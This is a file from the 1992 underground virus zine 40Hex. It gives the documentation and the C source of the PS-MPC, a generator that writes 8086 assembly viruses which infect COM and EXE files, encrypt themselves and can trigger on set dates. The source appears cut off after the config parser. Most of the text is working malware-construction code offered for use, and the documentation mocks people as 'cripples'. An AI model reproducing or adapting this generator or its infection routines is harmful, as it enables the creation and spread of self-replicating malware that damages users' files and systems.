Copy Link
Add to Bookmark
Report
40Hex Issue 08 File 001
40Hex Number 8 Volume 2 Issue 4 File 001
Once again, -=PHALCON/SKISM=- pisses off the PD scene. Now anyone
can make their own virus, and give it to Gary Watson, the only guy on
Fidonet who we love. Without him, we would never get the fame that we
now covet so greatly. Well, that is until we got our official Pepsi
Gotta Have It Cards. Thank you Gary.
-) Gheap
----------------------------- Docs -n- code begin --------------------------
PS-MPC
Pretty Slick Multimedia Personal Computer
(NOT)
Phalcon/Skism Mass-Produced Code Generator 0.90a
Created by Dark Angel
TABLE OF CONTENTS
DEDICATION i
DISCLAIMER ii
PURPOSE ii
WHAT IS THE PS-MPC? 1
USING THE PS-MPC 1
NO ACTIVATION ROUTINES 1
WHY NO IDE 2
SOURCE CODE AVAILABILITY 2
PROBLEMS 2
FUTURE ENHANCEMENTS 2
HISTORY OF VIRUS TOOLKITS A
DEDICATION
The author hereby releases this program and its source code into the
public domain as "freeware." All code generated by the program must,
however, retain the designation of said program, although all other parts
may be modified at the user's discretion. The author dedicates this
program to both the virus and anti-virus communities, both of which profit
from the introduction of the Phalcon/Skism Mass-Produced Code Generator.
Thanks are due to NoWhere Man for his excellent program VCL, which
served as the inspiration for this package.
--
DISCLAIMER
This program may cause either the intentional or unintentional
disruption of normal brain wave activity of the user due to the extreme
shock quality of the program. The author hereby absolves himself of all
liability. Persons with pacemakers beware!
The code produced by the Phalcon/Skism Mass-Produced Code Generator
is not designed to be damaging; however, the author is not responsible for
incidental damages caused by use of the program. Further, the author is
not responsible for damages caused by changes to the code generated by the
PS-MPC. The author does not condone the illegal spread of executable code
created in part or in whole by the PS-MPC. All source code and executable
files created with the aid of the PS-MPC must be distributed with the reci-
pient's full knowledge of the contents. Malicious use of the code is
strictly prohibited.
PURPOSE
The Phalcon/Skism Mass-Produced Code Generator is not designed to
create malicious code; rather, it is a learning tool from which a person
may learn to write effective viral code. The code generated by the PS-MPC
is highly optimised for both size and speed and is therefore the code
generated can be used by the fledgling virus writer as a model for future
endeavours.
--
WHAT IS THE PS-MPC?
The Phalcon/Skism Mass-Produced Code Generator is a tool which
generates viral code according to user-designated specifications. The
output is in Masm/Tasm-compatible Intel 8086 assembly and it is up to the
user to assemble the output into working executable form. The features of
the PS-MPC include the following:
o Over 150 encryption techniques, randomly generated during each run of
the PS-MPC
o Compact, commented code, much tighter than VCL
o COM/EXE infections
o Two types of traversals
o Optional infection of Command.Com
o Critical error handler support
USING THE PS-MPC
The syntax of the PS-MPC is simple:
PS-MPC <file1> <file2> <file3>...
The parameters given to the PS-MPC are the names of the configuration
files. For example, to create two separate viruses using the configuration
files FOOBAR1.CFG and FOOBAR2.CFG, simply type "PS-MPC FOOBAR1.CFG
FOOBAR2.CFG" at the prompt.
The configuration file is a text file containing a set of parameters
which define the output of the PS-MPC. A sample configuration file,
SKELETON.CFG is included with the package. This configuration file
contains all the acceptable parameters that the PS-MPC will accept. It
also includes the defaults to each of these parameters. The configuration
file is self-explanatory, so there is no need to go into further detail at
this time.
When the Generator has completed creating the source code file/s,
simply assemble the output file/s with your favorite assembler/linker
combination. A multi-pass assembler is recommended. Masm is a poor choice
for an assembler; try Tasm. Masm requires the code to include extra
segment overrides which unnecessarily add to the code length. Masm 6.0 may
fix these problems (I'm not sure since I don't have it). Tasm, on the
other hand, is an excellent, fast, multipass assembler far superior to
Masm.
NO ACTIVATION ROUTINES
I have not included any activation routines in the package simply
because I do not think the power of creating potentially-destructive
viruses should be in the hands of persons incapable of coding a simple
activation routine in assembly. If you can rip a simple FAT-annihilator
out of another trojan, then I cannot stop you from doing so. But just
remember that the most memorable viruses are not necessarily those that
cause the most damage, but are usually those that have unusual activation
routines.
Upon finding activation conditions, the PS-MPC will generate a short
stub for the activation routine. This is located immediately after the
code for the restoration of the executable files. It is identified by the
label "activate" and is followed by a return. Insert your own activation
routine between those two lines.
--
WHY NO IDE (Integrated Development Environment)
Everyone agrees that Microsoft Windows is for cripples. Obviously,
you, the user of the PS-MPC, are no cripple, so you need no puny IDE with
colourful, deluxe windows to aid you. If you are a cripple, go ahead and
create the configuration file in your favorite Windows text editor. Hell,
port the code to the Macintosh and you can be truly crippled (although
you'll have your pretty windows and icons).
SOURCE CODE AVAILABILITY
This program is distributed with full source code. Although the
source should be self-explanatory, I have gone back and commented several
portions in order to facilitate understanding. The program was written in
Turbo C 2.0 and compiled in the tiny memory model. I trust that you will
not hack this program and call it your own. Source code is available only
because I think it will aid in your understanding of the program.
PROBLEMS
This program was written hastily. The bulk of the coding was
completed in under two days. Features were added by the process of
accretion during the following week. Needless to say, the code is now
extremely unmanageable. If there is enough interest in the package, I will
rewrite it in order to alleviate the strain caused in maintaining such
code. This will help in adding features as the need arises.
There MAY be some bugs in this version since it hasn't been thoroughly
tested yet. Report all bugs to me (duh). Be sure to save the configuration
file of the faulty code so the bug may be reproduced. Better yet, find the
problem, fix the C source, and send it to me. Zowie!
FUTURE ENHANCEMENTS
As you may have already noticed, this is a pre-1.0 release version of
the Generator. There are several features which I wish to add before
version 1.0. These include, but are not limited to, resident viruses,
padded-EXE infections (shorter routine), and better documentation(!). A
few surprises will be thrown in as well. I do not plan on increasing the
size of the PS-MPC.COM file dramatically, so with every addition will come
code to keep the increase in file size to a minimum. I do not intend to
devote too much time to the project as I personally don't actually use the
generator to spew out code for the group.
Note: The version included with 40Hex-8 is not the latest version. Due to
space considerations, we could not include the source code to version 0.91
which is somewhat larger.
--
HISTORY OF VIRUS TOOLKITS
The first known virus toolkit was called VCS, or Virus Construction
Set. This program generated a new virus each time it was run. However,
there were no code differences at all between any two viruses generated by
VCS. All viruses generated were 1077 bytes in length and all could be
detected with the identical scan string. The advantage in this approach
was that the user needed absolutely no knowledge of 8086 assembly to take
advantage of this program. This program of limited usefulness spawned only
one well-known variant called Manta. It is not even worth mentioning here.
The second virus toolkit was CrazySoft, Inc.'s Dark Avenger Mutation
Engine (MtE). This magnificent work of Bulgarian coding allowed virus
authors to create viruses with an almost limitless number of decryption
routines. Although the author needed to know how to write 8086 assembly
code, no knowledge of the inner workings of MtE save the entry parameters
was needed to use this toolkit. It has since spawned several viruses,
including Dedicated, Pogue, Fear, and Groove.
The next virus toolkit to be released was VCL, or Virus Construction
Laboratory. This was written by NoWhere Man of NuKE. This toolkit allowed
the user many options, including the creation of parasitic COM infectors,
spawning EXE infectors, trojan horses and logic bombs. Since it could only
handle parasitic infections of the COM file format, it was of limited
usefulness. Additionally, it incorporated only one decryption formula,
once again limiting its usefulness. Further, the initial release included
a quirky installation program which failed to install properly under
certain conditions. However, this package contained a colourful IDE
loosely based on the Borland interface. This IDE was incredibly simple to
use and even the average Joe could understand how to use it without
understanding 80x86 assembly. Unfortunately, the activation routines
included with the package were of limited usefulness. Most of these
involved manipulating the BIOS memory area at segment 40h.
--
------------------------------ Source code begins ---------------------------
/* FILE: VHEADER.H */
#ifndef __VHEADER_H
#define __VHEADER_H
/* infect */
#define COM 1
#define EXE 2
/* traverse */
#define NONE 0
#define DOT_DOT 1
typedef struct {
char always;
char number;
char month;
char day;
int year;
char dow;
int monthday;
char hour;
char minute;
char second;
char percentage;
} activation_conditions;
typedef struct {
unsigned infectCOM : 1;
unsigned infectEXE : 1;
unsigned traverse : 1; /* Currently only two types */
unsigned encrypt : 1;
unsigned int24 : 1;
unsigned CommandCom : 1;
unsigned allowzero : 1;
unsigned calls_check : 1;
} parameters;
typedef struct {
char configfilename[80];
char asmfilename[80];
char id[3];
char virusname[80];
char virusnamedelim;
char authorname[80];
char authornamedelim;
unsigned minsize, maxsize;
char maxinfect;
parameters p;
char xor_value;
char xor_comment[40];
char activation;
activation_conditions activate, plusminus;
} globals;
/* prototypes from vmain.c */
void print(char *s, char *t);
void printlabel(char *s, char *t);
void addvar(char *s, char *t, char *u);
void printblank(void);
/* prototypes from vheap.c */
void addheap(char *s, char *t, char *u);
void _addheap(char *s);
void resetheap(void);
/* code generating prototypes */
void code_header(void);
void code_encryption(void);
void code_setup(void);
void code_traversal(void);
void code_check_activation(void);
void code_return(void);
void code_activate(void);
void code_messages(void);
void code_check(void);
void code_infect(void);
void code_subroutines(void);
void code_variables(void);
void code_heap(void);
void code_tail(void);
#ifndef MAIN
extern globals config;
#endif
#endif /* __VHEADER_H */
----------------------------------- Cut Here --------------------------------
/* FILE: VACTIVE.C */
#include "vheader.h"
void code_activate(void)
{
if (config.activation)
{
printlabel("activate:","Conditions satisfied");
printlabel("; Insert your activation code here","");
print("jmp exit_virus","");
printblank();
}
}
----------------------------------- Cut Here --------------------------------
/* FILE: VCACTIVE.C */
#include "vheader.h"
void code_get_date(void);
void code_get_time(void);
void code_jmp(char c);
char coded_date, coded_time, Activation;
void code_check_activation(void)
{
char b[80];
coded_date = coded_time = 0;
Activation = config.activation;
if (config.activate.always)
printlabel("jmp activate","Always activate");
else {
if (config.activate.month) {
code_get_date();
sprintf(b,"cmp dh,%d",config.activate.month);
print(b,"Check month");
code_jmp(config.plusminus.month);
}
if (config.activate.day) {
code_get_date();
sprintf(b,"cmp dl,%d",config.activate.day);
print(b,"Check date");
code_jmp(config.plusminus.day);
}
if (config.activate.year) {
code_get_date();
sprintf(b,"cmp cx,%u",config.activate.year);
print(b,"Check year");
code_jmp(config.plusminus.year);
}
if (config.activate.dow != 255) {
code_get_date();
sprintf(b,"cmp al,%d",config.activate.dow);
print(b,"Check date of week");
code_jmp(config.plusminus.dow);
}
if (config.activate.monthday) {
code_get_date();
sprintf(b,"cmp dx,0%xuh",config.activate.monthday);
print(b,"Check month/date");
code_jmp(config.plusminus.monthday);
}
if (coded_date) printblank();
if (config.activate.hour != 255) {
code_get_time();
sprintf(b,"cmp ch,%d",config.activate.hour);
print(b,"Check the hour");
code_jmp(config.plusminus.hour);
}
if (config.activate.minute != 255) {
code_get_time();
sprintf(b,"cmp cl,%d",config.activate.minute);
print(b,"Check the minute");
code_jmp(config.plusminus.minute);
}
if (config.activate.second != 255) {
code_get_time();
sprintf(b,"cmp dh,%d",config.activate.second);
print(b,"Check the seconds");
code_jmp(config.plusminus.second);
}
if (config.activate.percentage) {
code_get_time();
sprintf(b,"cmp dl,%d",config.activate.percentage);
print(b,"Check the percentage");
code_jmp(-1);
if (coded_time) printblank();
}
}
}
void code_jmp(char c)
{
if (--Activation) {
if (c == 1)
print("jb exit_virus","");
else if (c == 0)
print("jnz exit_virus","");
else if (c == 255)
print("ja exit_virus","");
} else {
if (c == 1)
print("jae config.activate","");
else if (c == 0)
print("jz config.activate","");
else if (c == 255)
print("jbe config.activate","");
}
}
void code_get_date(void)
{
if (!coded_date) {
print("mov ah,2ah","Get current date");
print("int 21h","");
coded_date++;
}
}
void code_get_time(void)
{
if (!coded_time) {
print("mov ah,2ch","Get current time");
print("int 21h","");
coded_time++;
}
}
----------------------------------- Cut Here --------------------------------
/* FILE: VCHECK.C */
#include "vheader.h"
void checkCOM(void);
void code_check(void)
{
if (config.p.calls_check)
printlabel("infect_mask:","");
print("mov ah,4eh","find first file");
print("mov cx,7","any attribute");
printlabel("findfirstnext:","");
print("int 21h","DS:DX points to mask");
if (config.p.calls_check)
print("jc exit_infect_mask","No mo files found");
else
print("jc done_infections","No mo files found");
printblank();
print("mov al,0h","Open read only");
print("call open","");
printblank();
print("mov ah,3fh","Read file to buffer");
print("lea dx,[bp+buffer]","@ DS:DX");
print("mov cx,1Ah","1Ah bytes");
print("int 21h","");
printblank();
print("mov ah,3eh","Close file");
print("int 21h","");
printblank();
if (config.p.infectEXE) {
if (config.p.infectCOM) {
print("cmp word ptr [bp+buffer],'ZM'","EXE?");
print("jz checkEXE","Why yes, yes it is!");
checkCOM();
}
printlabel("checkEXE: cmp word ptr [bp+buffer+10h],id","is it already
infected?");
print("jnz infect_exe","");
} else
checkCOM();
printlabel("find_next:","");
print("mov ah,4fh","find next file");
print("jmp short findfirstnext","");
if (config.p.calls_check) {
printlabel("exit_infect_mask: ret","");
printblank();
}
}
void checkCOM(void)
{
char s[80];
printlabel("checkCOM:","");
if (!config.p.CommandCom)
{
print("mov ax,word ptr [bp+newDTA+35]","Get tail of filename");
print("cmp ax,'DN'","Ends in ND? (commaND)");
print("jz find_next","");
printblank();
}
print("mov ax,word ptr [bp+newDTA+1Ah]","Filesize in DTA");
if (config.minsize)
{
if (config.minsize == 1) /* automatic calculation */
if (config.p.encrypt)
strcpy(s,"cmp ax,(heap-decrypt)");
else
strcpy(s,"cmp ax,(heap-startvirus)");
else /* if (minsize != 1) */
sprintf(s,"cmp ax,%u",config.minsize);
print(s,"Is it too small?");
print("jb find_next","");
printblank();
}
if (config.maxsize)
{
if (config.maxsize == 1) /* automatic calculation */
if (config.p.encrypt)
strcpy(s,"cmp ax,65535-(endheap-decrypt)");
else
strcpy(s,"cmp ax,65535-(endheap-startvirus)");
else
sprintf(s,"cmp ax,%u",config.maxsize);
print(s,"Is it too large?");
print("ja find_next","");
printblank();
}
print("mov bx,word ptr [bp+buffer+1]","get jmp location");
if (config.p.encrypt)
print("add bx,heap-decrypt+3","Adjust for virus size");
else
print("add bx,heap-startvirus+3","Adjust for virus size");
print("cmp ax,bx","");
print("je find_next","already infected");
print("jmp infect_com","");
}
----------------------------------- Cut Here --------------------------------
/* VENCRYPT.C */
#include <stdlib.h>
#include "vheader.h"
void code_loop_count(void);
void code_loop_start(void);
void code_decrypt_code(void);
char mem_counter;
char mem_registers[4][3] = {
"bx",
"bp",
"si",
"di"
};
char loop_counter;
char loop_registers[7][3] = {
"ax", "bx", "cx", "dx", "bp", "si", "di"
};
char xor_registers[4][2] = {
{ 0x81, 0x37 },
{ 0x81, 0x76 },
{ 0x81, 0x34 },
{ 0x81, 0x35 }
};
char add_registers[4][2] = {
{ 0x81, 0x07 }, /* add [bx],xxxx / db 81h, 7h,xxh,xxh */
{ 0x81, 0x46 }, /* add [bp],xxxx / db 81h,46h,00,xxh,xxh */
{ 0x81, 0x04 },
{ 0x81, 0x05 },
};
void code_encryption(void)
{
if (config.p.encrypt) {
srand(peek(0,0x46C));
printlabel("decrypt:","handles encryption and decryption");
if ((loop_counter = random(10)) > 6) /* if out of bounds */
loop_counter = 2; /* set it = to cx */
while (1) {
mem_counter = random(4);
if (strcmp(mem_registers[mem_counter = random(4)],
loop_registers[loop_counter]))
break;
}
if (random(2)) {
code_loop_count();
code_loop_start();
} else {
code_loop_start();
code_loop_count();
}
code_decrypt_code();
}
}
void code_loop_count(void)
{
char b[80];
sprintf(b,"mov %s,(offset heap - offset startencrypt)/2",
loop_registers[loop_counter]);
print(b,"iterations");
}
void code_loop_start(void)
{
char b[80];
printlabel("patch_startencrypt:","");
sprintf(b,"mov %s,offset startencrypt",
mem_registers[mem_counter]);
print(b,"start of decryption");
}
void code_decrypt_code(void)
{
char b[80],c[80];
printlabel("decrypt_loop:","");
config.xor_value = 0;
switch (random(2))
{
case 0 : sprintf(b,"db %s%2.2xh,%2.2xh%s",
(config.p.infectEXE) ? "2eh," : "",
xor_registers[mem_counter][0],
xor_registers[mem_counter][1],(mem_counter == 1) ? ",0":"");
sprintf(c,"xor word ptr %s[%s], xxxx",
(config.p.infectEXE) ? "cs:" : "",mem_registers[mem_counter]);
break;
case 1 : sprintf(b,"db %s%2.2xh,%2.2xh%s",
(config.p.infectEXE) ? "2eh," : "",
add_registers[mem_counter][0],
add_registers[mem_counter][1],(mem_counter == 1) ? ",0":"");
sprintf(c,"add word ptr %s[%s], xxxx",
(config.p.infectEXE) ? "cs:" : "",mem_registers[mem_counter]);
config.xor_value = 0x28;
strcpy(config.xor_comment,"flip between add/sub");
break;
}
print(b,c);
printlabel("decrypt_value dw 0","initialised at zero for null effect");
sprintf(c,"inc %s",mem_registers[mem_counter]);
print(c,"calculate new decryption location");
print(c,"");
if (loop_counter - 2)
{
sprintf(b,"dec %s",loop_registers[loop_counter]);
print(b,"If we are not done, then");
print("jnz decrypt_loop","decrypt mo'");
} else
print("loop decrypt_loop","decrypt mo'");
printlabel("startencrypt:","");
}
----------------------------------- Cut Here --------------------------------
/* FILE: VHEADER.C */
#include "vheader.h"
void code_header(void)
{
char b[80];
sprintf(b,"; %s : %s by %s",config.asmfilename,
(config.virusname[0]) ? config.virusname : "Unknown",
(config.authorname[0])? config.authorname: "Unknown");
printlabel(b,"");
printlabel("; Created wik the Phalcon/Skism Mass-Produced Code
Generator","");
sprintf(b,"; from the configuration file %s",config.configfilename);
printlabel(b,"");
printblank();
printlabel(".model tiny","Handy directive");
printlabel(".code","Virus code segment");
print("org 100h","COM file starting IP\n");
if (config.p.infectEXE)
{
sprintf(b,"id = '%s'",config.id);
printlabel(b,"ID word for EXE infections");
}
if (config.p.infectCOM)
if (config.p.encrypt)
printlabel("entry_point: db 0e9h,0,0","jmp decrypt");
else
printlabel("entry_point: db 0e9h,0,0","jmp startvirus");
printblank();
}
----------------------------------- Cut Here --------------------------------
/* FILE: VHEAP.C */
#include "vheader.h"
char heap[30][80];
char max;
void code_heap(void)
{
printlabel("heap:","Variables not in code");
if (max)
while (max--)
printlabel(heap[max],"");
else
printlabel("; No heap to speak of","");
printlabel("endheap:","End of virus");
}
void addheap(char *s, char *t, char *u)
{
if (*u)
sprintf(heap[max++],"%-20.20s%-20.20s; %-37.37s",s,t,u);
else
sprintf(heap[max++],"%-20.20s%s",s,t);
}
void _addheap(char *s)
{
strcpy(heap[max++],s);
}
void resetheap(void)
{
max=0;
}
----------------------------------- Cut Here --------------------------------
/* FILE: VINFECT.C */
#include "vheader.h"
void write_encrypt(void);
void code_infect_EXE(void);
void code_infect(void)
{
if (config.p.infectEXE) {
printlabel("infect_exe:","");
code_infect_EXE();
if (config.p.infectCOM)
print("jmp short finishinfection","");
}
if (config.p.infectCOM) {
printlabel("infect_com:","ax = filesize");
print("mov cx,3","");
print("sub ax,cx","");
print("lea si,[bp+offset buffer]","");
print("lea di,[bp+offset save3]","");
print("movsw","");
print("movsb","");
print("mov byte ptr [si-3],0e9h","");
print("mov word ptr [si-2],ax","");
if (config.p.encrypt)
{
print("add ax,103h","");
print("push ax","needed later");
}
}
printlabel("finishinfection:","");
print("push cx","Save # bytes to write");
print("xor cx,cx","Clear attributes");
print("call attributes","Set file attributes");
printblank();
print("mov al,2","");
print("call open","");
printblank();
print("mov ah,40h","Write to file");
print("lea dx,[bp+buffer]","Write from buffer");
print("pop cx","cx bytes");
print("int 21h","");
printblank();
print("mov ax,4202h","Move file pointer");
print("xor cx,cx","to end of file");
print("cwd","xor dx,dx");
print("int 21h","");
printblank();
if (config.p.encrypt) {
write_encrypt();
} else {
print("mov ah,40h","Concatenate virus");
print("lea dx,[bp+startvirus]","");
print("mov cx,heap-startvirus","# bytes to write");
print("int 21h","");
printblank();
}
print("mov ax,5701h","Restore creation date/time");
print("mov cx,word ptr [bp+newDTA+16h]","time");
print("mov dx,word ptr [bp+newDTA+18h]","date");
print("int 21h","");
printblank();
print("mov ah,3eh","Close file");
print("int 21h","");
printblank();
print("mov ch,0","");
print("mov cl,byte ptr [bp+newDTA+15h]","Restore original");
print("call attributes","attributes");
printblank();
if (config.maxinfect)
{
print("dec byte ptr [bp+numinfec]","One mo infection");
print("jnz mo_infections","Not enough");
if (config.p.calls_check)
print("pop ax","remove call from stack");
print("jmp done_infections","");
}
printlabel("mo_infections: jmp find_next","");
printblank();
}
void write_encrypt(void)
{
if (!config.p.allowzero)
printlabel("get_encrypt_value:","");
print("mov ah,2ch","Get current time");
print("int 21h","dh=sec,dl=1/100 sec");
if (!config.p.allowzero) {
print("or dx,dx","Check if encryption value = 0");
print("jz get_encrypt_value","Get another if it is");
}
print("mov [bp+decrypt_value],dx","Set new encryption value");
addheap("code_store:","db (startencrypt-decrypt)*2+(endwrite-write)+1 dup
(?)","");
_addheap("; The following code is the buffer for the write function");
print("lea di,[bp+code_store]","");
print("mov ax,5355h","push bp,push bx");
print("stosw","");
print("lea si,[bp+decrypt]","Copy encryption function");
print("mov cx,startencrypt-decrypt","Bytes to move");
print("push si","Save for later use");
print("push cx","");
print("rep movsb","");
printblank();
if (config.xor_value)
{
char b[80];
sprintf(b,"xor byte ptr [bp+decrypt_loop+%c],0%2.2xh",
(config.p.infectEXE) ? '2' : '1', config.xor_value);
print(b,config.xor_comment);
printblank();
}
print("lea si,[bp+write]","Copy writing function");
print("mov cx,endwrite-write","Bytes to move");
print("rep movsb","");
print("pop cx","");
print("pop si","");
print("pop dx","Entry point of virus");
print("push di","");
print("push si","");
print("push cx","");
print("rep movsb","Copy decryption function");
print("mov ax,5b5dh","pop bx,pop bp");
print("stosw","");
print("mov al,0c3h","retn");
print("stosb","");
printblank();
print("add dx,offset startencrypt - offset decrypt","Calculate new");
print("mov word ptr [bp+patch_startencrypt+1],dx","starting offset of");
print("call code_store","decryption");
print("pop cx","");
print("pop di","");
print("pop si","");
print("rep movsb","Restore decryption function");
printblank();
}
void code_infect_EXE(void)
{
print("les ax, dword ptr [bp+buffer+14h]","Save old entry point");
print("mov word ptr [bp+jmpsave2], ax","");
print("mov word ptr [bp+jmpsave2+2], es","");
printblank();
print("les ax, dword ptr [bp+buffer+0Eh]","Save old stack");
print("mov word ptr [bp+stacksave2], es","");
print("mov word ptr [bp+stacksave2+2], ax","");
printblank();
print("mov ax, word ptr [bp+buffer + 8]","Get header size");
print("mov cl, 4","convert to bytes");
print("shl ax, cl","");
print("xchg ax, bx","");
printblank();
print("les ax, [bp+offset newDTA+26]","Get file size");
print("mov dx, es","to DX:AX");
print("push ax","");
print("push dx","");
printblank();
print("sub ax, bx","Subtract header size from");
print("sbb dx, 0","file size");
printblank();
print("mov cx, 10h","Convert to segment:offset");
print("div cx","form");
printblank();
print("mov word ptr [bp+buffer+14h], dx","New entry point");
print("mov word ptr [bp+buffer+16h], ax","");
printblank();
print("mov word ptr [bp+buffer+0Eh], ax","and stack");
print("mov word ptr [bp+buffer+10h], id","");
printblank();
print("pop dx","get file length");
print("pop ax","");
printblank();
if (config.p.encrypt)
print("add ax, heap-decrypt","add virus size");
else
print("add ax, heap-startvirus","add virus size");
print("adc dx, 0","");
printblank();
print("mov cl, 9","");
print("push ax","");
print("shr ax, cl","");
print("ror dx, cl","");
print("stc","");
print("adc dx, ax","");
print("pop ax","");
print("and ah, 1","mod 512");
printblank();
print("mov word ptr [bp+buffer+4], dx","new file size");
print("mov word ptr [bp+buffer+2], ax","");
printblank();
print("push cs","restore ES");
print("pop es","");
printblank();
if (config.p.encrypt)
print("push word ptr [bp+buffer+14h]","needed later");
print("mov cx, 1ah","");
}
----------------------------------- Cut Here --------------------------------
/* FILE: VMAIN.C */
/* The Phalcon/Skism Mass-Produced Code Generator *
* Version 0.90a - 27 Jul 92 - Initial Release *
* Written by Dark Angel of Phalcon/Skism *
* Source code released with 40Hex-8 *
*/
#include <stdio.h>
#define MAIN
#include "vheader.h"
#undef MAIN
globals config;
void parse_config(void);
unsigned getnumber(int line, char *d, char ok, char *next);
char getyn(int line, char *d);
void setplusminus(char *a, char b);
void parseactivate(int line, char *d, char min, char max, char *a, char
*b,char *s);
void printerror(int line, char c);
void getDBname(char *orig, char *name,char *delim);
FILE *fp;
void main(int argc, char **argv)
{
char c,filename[80];
puts("PS-MPC ~ Phalcon/Skism Mass Produced Code Generator");
puts(" ~ Version 0.90a Written by Dark Angel\n");
if (argc < 2)
{
puts("Syntax: PS-MPC <file1> <file2> ...");
puts(" file1 = name of first configuration file");
puts(" file2 = name of second configuration file");
}
for (c=1;c<argc;c++)
{
if ((fp = fopen(argv[c],"rt")) == NULL)
{
printf("Error opening configuration file (%s).\n",argv[c]);
puts("Skipping file...");
continue;
}
printf("Reading configuration file (%s)...",argv[c]);
resetheap();
parse_config();
strcpy(config.configfilename,argv[c]);
fclose(fp);
puts("Done!");
if (!config.p.infectCOM && !config.p.infectEXE) {
puts("Warning: Virus does not infect any type of file.");
puts("Remedy: Use the \"infect\" parameter in the configuration
file.");
puts("Skipping file...");
continue;
}
if (!config.asmfilename[0]) {
puts("Warning: No target file name specified.");
puts("Remedy: Use the \"filename\" parameter in the configuration
file.");
puts("Skipping file...");
continue;
}
if ((fp = fopen(config.asmfilename,"wt")) == NULL)
{
printf("Error opening target file (%s).\n",config.asmfilename);
puts("Skipping file...");
continue;
}
printf("Creating target file (%s)...",config.asmfilename);
code_header();
code_encryption();
code_setup();
code_traversal();
code_check_activation();
code_return();
code_activate();
code_messages();
if (config.p.calls_check)
code_check();
code_infect();
code_subroutines();
code_variables();
code_heap();
code_tail();
fclose(fp);
puts("Done!");
}
puts("\nThank you for using the Phalcon/Skism Mass Produced Code
Generator");
exit(0);
}
void print(char *s, char *t)
{
char b[80];
sprintf(b," %s",s);
printlabel(b,t);
}
void printlabel(char *s, char *t)
{
int i = 0;
if (*s)
if (*t) {
i = fprintf(fp,"%-40s",s);
if (i > 40)
fputc(' ',fp);
fprintf(fp,"; %s",t);
} else /* if (*t) */
fprintf(fp,s);
fprintf(fp,"\n");
}
void addvar(char *s, char *t, char *u)
{
char b[80];
if (*u)
sprintf(b,"%-20.20s%-20.20s; %s",s,t,u);
else
sprintf(b,"%-20.20s%s",s,t);
printlabel(b,"");
}
void parse_config(void)
{
char b[80];
char *c, *d;
int line = 0;
globals default_globals = {
"", /* Configuration file name */
"", /* Source code file name */
" ", /* EXE ID Word */
"", /* Virus name */
'\'', /* Deliminator for virus name */
"", /* Author name */
'\'', /* Deliminator for author name */
0, /* Minimum COM size for infection */
0, /* Maximum COM size for infection */
0, /* Infections per run */
{ 0,0,NONE,0,0,0,0 }, /* flags */
0, /* xor value */
"", /* xor comment */
0, /* number of activation conditions */
{ 0,0,0,0,0,-1,0,-1,-1,-1,0 }, /* activation conditions */
{ 0,0,0,0,0, 0,0, 0, 0, 0,-1} /* plusminus activation conditions */
};
config = default_globals;
while (1)
{
line++;
b[0]=0;
c = fgets(b,100,fp);
if (!b[0])
break;
while (isspace(*c)) c++; /* skip initial spaces */
if (!*c || *c == ';') continue; // check if this line is a comment
d = c;
while (!isspace(*d)) d++; /* isolate one word */
*d++ = 0; /* NULL terminate it */
while (isspace(*d) || (*d == '=')) d++;
if (!stricmp(c,"filename"))
{
c = d;
while (!isspace(*d)) d++; /* isolate filename */
*d = 0;
strcpy(config.asmfilename,c);
}
else if (!stricmp(c,"traversal"))
switch (toupper(*d))
{
case 'N' : config.p.traverse = NONE; break;
case 'D' : config.p.traverse = DOT_DOT; break;
default : printerror(line,*d);
}
else if (!stricmp(c,"encryption")) config.p.encrypt = getyn(line,d);
else if (!stricmp(c,"infect")) {
while (!isspace(*d)) {
switch (toupper(*d))
{
case 'C' : config.p.infectCOM = 1; break;
case 'E' : config.p.infectEXE = 1; break;
case ',' : break;
default : printerror(line,*d);
}
d++;
}
}
else if (!stricmp(c,"idword")) {
config.id[0] = (isspace(*d)) ? ' ' : *d;
config.id[1] = (isspace(*(d+1))) ? ' ' : *(d+1);
config.id[2]=0;
}
else if (!stricmp(c,"minsize")) {
if (toupper(*d) == 'A')
config.minsize = 1;
else {
config.minsize = getnumber(line,d,0,0);
if (config.maxsize > 1)
if (config.minsize > config.maxsize)
puts("Error: minsize is greater than maxsize!");
}
}
else if (!stricmp(c,"maxsize")) {
if (toupper(*d) == 'A')
config.maxsize = 1;
else {
config.maxsize = getnumber(line,d,0,0);
if (config.minsize > 1)
if (config.maxsize < config.minsize)
printf("Error: minsize is greater than maxsize!\n");
}
}
else if (!stricmp(c,"infections"))
config.maxinfect = (unsigned char)getnumber(line,d,0,0);
else if (!stricmp(c,"errorhandler"))
config.p.int24 = getyn(line,d);
else if (!stricmp(c,"commandcom"))
config.p.CommandCom = getyn(line,d);
else if (!stricmp(c,"virusname"))
getDBname(d,config.virusname,&config.virusnamedelim);
else if (!stricmp(c,"authorname"))
getDBname(d,config.authorname,&config.authornamedelim);
else if (!stricmp(c,"allowzero"))
config.p.allowzero = getyn(line,d);
else if (!stricmp(c,"always")) {
config.activate.always = getyn(line,d);
if (config.activate.always) config.activation++;
}
else if (!stricmp(c,"ifmonth"))
parseactivate(line,d,1,12,&config.activate.month,&config.plusminus.month,"mont
h");
else if (!stricmp(c,"ifday"))
parseactivate(line,d,1,31,&config.activate.day,&config.plusminus.day,"day");
else if (!stricmp(c,"ifyear"))
{
config.activate.year = getnumber(line,d,'+',d);
setplusminus((char *)&config.plusminus.year,*d);
config.activation++;
}
else if (!stricmp(c,"ifdow"))
parseactivate(line,d,0,6,&config.activate.dow,&config.plusminus.dow,"date of
week");
else if (!stricmp(c,"ifmonthday"))
{
int tempint;
char temp=(char)getnumber(line,d,',',d);
if ((temp < 1) || (temp > 12))
printf("Invalid month: %d. Must range between 1 and 12.\n",temp);
else {
d++;
tempint = temp*0x100;
temp=(char)getnumber(line,d,'+',d);
if ((temp < 1) || (temp > 31))
{
printf("Invalid day: %d. Must range between 1 and 31.\n",temp);
} else {
config.activate.monthday=tempint + temp;
setplusminus((char *)&config.plusminus.monthday,*d);
config.activation++;
}
}
}
else if (!stricmp(c,"ifhour"))
parseactivate(line,d,0,23,&config.activate.hour,&config.plusminus.hour,"hour")
;
else if (!stricmp(c,"ifminute"))
parseactivate(line,d,0,59,&config.activate.minute,&config.plusminus.minute,"mi
nute");
else if (!stricmp(c,"ifsecond"))
parseactivate(line,d,0,59,&config.activate.second,&config.plusminus.second,"se
cond");
else if (!stricmp(c,"percentage"))
parseactivate(line,d,1,99,&config.activate.percentage,0,"percentage");
else if (!isspace(c))
printf("Error in line %d: Invalid parameter '%s'.\n",line,c);
}
}
unsigned int getnumber(int line,char *d,char ok,char *next)
{
int temp = 0;
while (isdigit(*d))
{
temp*=10;
temp+=(*d-'0');
d++;
}
if ((ok == '+') && (!((*d == '+') || (*d == '-'))) && !isspace(*d))
printerror(line,*d);
else
if (next) *next=*d;
return temp;
}
